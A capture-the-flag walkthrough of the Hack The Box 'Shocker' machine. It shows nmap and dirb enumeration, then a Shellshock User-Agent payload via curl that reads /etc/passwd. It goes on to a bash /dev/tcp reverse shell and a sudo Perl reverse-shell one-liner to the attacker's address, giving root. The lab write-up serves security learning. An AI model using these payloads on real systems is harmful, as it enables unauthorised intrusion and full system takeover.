How to crack Shocker box without Metasploit.

tl;dr

  • ShellShocker exploit
  • Apache mod_cgi

Solved by : 7h3M0nk

The IP of the box is 10.10.10.56, the other thing that we know is, it’s a Linux box.

Enumeration

Doing a port scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
nmap -Pn -sCV -p80-2222 10.10.10.56

Nmap scan report for 10.10.10.56
Host is up (0.19s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Mon Feb 8 05:11:07 2021 -- 1 IP address (1 host up) scanned in 13.29 seconds

We are able to see an Apache server running at port 80 and OpenSSH at port 2222

Doing a serach on the know exploits of the Apache version landed me onto the exploit db page which explains about Apache mod_cgi, which allows Remote Command Injection.

Checking the page http://10.10.10.56/cgi-bin/ is giving 403 Permission denied.

Let’s use DirBuster to check if any files are available, preferably configuration files.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

dirb http://10.10.10.56/cgi-bi/ -X .sh .py

START_TIME: Mon Feb 8 10:51:37 2021
URL_BASE: http://10.10.10.56/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh,.py) | (.sh)(.py) [NUM = 2]
-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.56/cgi-bin/ ----
+ http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:118)

-----------------
END_TIME: Mon Feb 8 11:07:40 2021
DOWNLOADED: 4612 - FOUND: 1

And we just found a configuration file named user.sh

Let’s use the file to inject commands and see if it works.

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali㉿kali)-[~/HackTheBox/Shocker/nmap]
└─$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \http:/10.10.10.56/cgi-bin/user.sh

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash

Yes!! That worked. Now to get the shell and grab the user flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

curl -H "user-agent:() { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.7/800 0>&1'" \http:/10.10.10.56/cgi-bin/user.sh

nc -nvlp 800

┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 800 1 ⨯
[sudo] password for kali:
listening on [any] 800 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.56] 41000
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$ cd ~/
cd ~/
shelly@Shocker:/home/shelly$ ls
ls
user.txt
shelly@Shocker:/home/shelly$ cat user.txt

We owned user, onto Privilage escalation.

Let’s see if the user has any binary which has sudoer permission.

1
2
3
4
5
6
7
8
9

shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl

It’s clear that perl has sudo access. Let’s pop a reverse shell using perl and get the root flag.

There is a cool repo named PaylodAllThings, where one can find almost all kinds off payloads.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

shelly@Shocker:/home/shelly$ sudo perl -e 'use Socket;$i="10.10.14.7";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'


┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 4242
[sudo] password for kali:
listening on [any] 4242 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.56] 53964
bash: no job control in this shell
root@Shocker:/home/shelly# whoami
whoami
root
root@Shocker:/home/shelly# cd ~/
cd ~/
root@Shocker:~# ls
ls
root.txt
root@Shocker:~# cat root.txt
cat root.txt

Solved Shocker :)